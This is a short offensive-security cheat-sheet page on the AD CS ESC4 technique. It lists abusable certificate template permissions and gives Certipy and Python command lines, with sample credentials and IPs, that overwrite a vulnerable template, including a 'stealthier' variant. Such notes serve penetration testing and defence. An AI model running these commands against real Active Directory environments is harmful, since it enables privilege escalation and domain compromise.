ESC4

Vulnerable Certificate Template ACEs

https://github.com/cfalta/PoshADCS

Right

Description

Owner

Implicit full control of the object, can edit any properties.

FullControl

Full control of the object, can edit any properties.

WriteOwner

Can modify the owner to an adversary-controlled principal.

WriteDacl

Can modify access control to grant an adversary FullControl.

WriteProperty

Can edit any properties.

Enumerate and Modify Templates

Automatically via Certipy:

$ certipy template -u snovvcrash@megacorp.local -p 'Passw0rd!' -target DC01.megacorp.local -template VulnTemplate -save-old -dc-ip 192.168.1.11
$ certipy template -u snovvcrash@megacorp.local -p 'Passw0rd!' -target DC01.megacorp.local -template VulnTemplate -configuration VulnTemplate.json -dc-ip 192.168.1.11

A stealthier approach is to dump all properties of the vulnerable cert and modify only the needed parts in Certipy's code:

$ python3 modifyCertTemplate.py -template VulnTemplate -raw megacorp.local/snovvcrash:'Passw0rd!' -dc-ip 192.168.1.11

Last updated 1 year ago